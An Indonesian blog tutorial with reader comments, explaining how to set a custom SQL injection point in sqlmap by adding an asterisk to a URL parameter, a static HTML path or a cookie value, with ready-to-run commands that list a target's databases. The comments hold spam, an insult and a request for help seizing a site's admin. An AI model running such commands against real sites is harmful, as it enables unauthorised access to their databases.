Menentukan Inject Point pada SQLmap

April 28, 2019 by Jack Wilder 10 Comments

Menentukan Inject Point pada SQLmap. Kita sering melihat tutorial bagaimana menginjeksi url yang vuln. Namun rata-rata tutorial yang diberikan adalah basic sqlmap dimana inject pointnya selalu sama yakni target.com/a.php?b=1. Nah, bagaimana jika inject pointnya berbeda? Di Sqlmap kita bisa menentukan inject pointnya.

Misalnya begini:

https://target.com/article.php?page=2&id=5

Dan inject pointnya ada di parameter id. Maka perintahnya

sqlmap -u "https://target.com/article.php?page=2&id=5*" --dbs

Ya, hanya dengan menambahkan karakter * di inject point. Hal ini juga berlaku jika yang diinject adalah halaman statis html. Misalnya vuln di

https://target.com/article-315'-abcde.html

Maka di sqlmap perintahnya

sqlmap -u "https://target.com/article-315*-abcde.html" --dbs

Begitu juga dengan sqlmap post data, inject pointnya bisa ditentukan, misalnya

sqlmap -u "http://targeturl" --cookie="param1=value1*;param2=value2"

referensi : https://miloserdov.org/?p=879

Comments

asu jalanan says

June 12, 2019 at 8:49 pm

min, kalo mau belajar dari dasar banget, liat dari artikel yang mana ya?

Reply
Test Xss says

July 19, 2019 at 11:25 pm

Test Xss

Reply
Test Xss says

July 19, 2019 at 11:26 pm

Test Xss

Reply
Test Xss says

July 19, 2019 at 11:27 pm

Test Xss

Reply
Albert says

August 7, 2019 at 1:29 pm

Kalo yg diketahui cuman admin.php nya aja min?

Reply
- rio says
  
  April 14, 2022 at 3:00 pm
  
  ya injectnya di www.domain.com/admin.php*
  
  Reply
njn says

October 19, 2019 at 10:47 am

kontol lu mmk jembdot

Reply
AN RIDHO EDI WIBOWO says

October 17, 2020 at 7:15 pm

kalau saya minta dibantu ambilkan admin web saya yang dibuatkan pihak ketiga bisa nggak sobat,saya nggak bisa kendalikan semua jadi ribet kawan.

Reply
vshs says

December 24, 2020 at 10:59 pm

testes

Reply
testes says

December 24, 2020 at 11:01 pm

teetesss

Reply

Reader Interactions

Comments

Leave a Reply Cancel reply